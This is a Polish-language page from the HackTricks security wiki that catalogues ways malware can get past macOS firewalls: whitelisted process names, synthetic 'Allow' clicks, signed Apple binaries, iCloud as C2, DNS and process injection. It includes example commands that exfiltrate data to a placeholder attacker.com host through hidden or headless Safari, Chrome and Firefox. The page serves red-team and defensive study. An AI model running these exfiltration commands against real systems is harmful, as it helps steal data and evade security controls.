hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
2024-02-11 01:46:25 +00:00

4.7 KiB

Bypassowanie zapór sieciowych w systemie macOS

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Znalezione techniki

Następujące techniki zostały znalezione i działają w niektórych aplikacjach zapór sieciowych w systemie macOS.

Wykorzystywanie nazw na białej liście

  • Na przykład nadanie złośliwemu oprogramowaniu nazw znanych procesów systemu macOS, takich jak launchd

Syntetyczne kliknięcie

  • Jeśli zapora sieciowa wymaga zgody użytkownika, złośliwe oprogramowanie może kliknąć na przycisk "Zezwól"

Używanie podpisanych binariów Apple

  • Na przykład curl, ale także inne, takie jak whois

Znane domeny Apple

Zapora sieciowa może zezwalać na połączenia z znanymi domenami Apple, takimi jak apple.com lub icloud.com. iCloud może być wykorzystywany jako C2.

Ogólne obejście

Kilka pomysłów na próbę obejścia zapór sieciowych

Sprawdź dozwolony ruch

Znajomość dozwolonego ruchu pomoże Ci zidentyfikować potencjalnie uwzględnione na białej liście domeny lub aplikacje, które mają do nich dostęp.

lsof -i TCP -sTCP:ESTABLISHED

Wykorzystywanie DNS

Rozwiązania DNS są realizowane za pomocą podpisanego programu mdnsreponder, który prawdopodobnie będzie miał dostęp do serwerów DNS.

https://www.youtube.com/watch?v=UlT5KFTMn2k

Za pomocą aplikacji przeglądarki

  • oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • Google Chrome

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Za pomocą wstrzykiwania procesów

Jeśli możesz wstrzyknąć kod do procesu, który ma uprawnienia do łączenia się z dowolnym serwerem, możesz ominąć zabezpieczenia zapory ogniowej:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

Odwołania

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: